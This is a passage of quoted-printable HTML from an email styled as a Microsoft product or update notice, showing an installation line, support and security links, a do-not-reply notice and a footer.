ALIGN=3D"absmiddle" BORDER=3D"0"> How to use</B></FONT></TD>
<TD NOWRAP><FONT SIZE=3D"1">You don't need to do =
anything after installing this item.</FONT></TD>
</TR>
</TABLE>
<BR>
<TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2">
Microsoft Product Support Services and Knowledge Base articles
can be found on the <A HREF=3D"http://support.microsoft.com/" =
TARGET=3D"_top">Microsoft Technical Support</A> web site. =
For security-related information about Microsoft products, please =
visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top">
Microsoft Security Advisor</A> web site, =
or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" =
TARGET=3D"_top">Contact Us.</A>
<BR><BR>
Thank you for using Microsoft products.<BR><BR></FONT>
<FONT SIZE=3D"1">Please do not reply to this message. =
It was sent from an unmonitored e-mail address and we are unable =
to respond to any replies.<BR></FONT>
<HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%">
<FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and =
products mentioned herein are the trademarks =
of their respective owners.</FONT>
</TD></TR></TABLE>
<BR>
<TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB">
<TR VALIGN=3D"TOP">
<TD WIDTH=3D"5"></TD>
<TD>
<FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B>
<A class=3D'navtext' HREF=3D"http://www.microsoft.com/=
contactus/contactus.asp" TARGET=3D"_top">Contact Us</A>
|
<A class=3D'navtext' HREF=3D"ht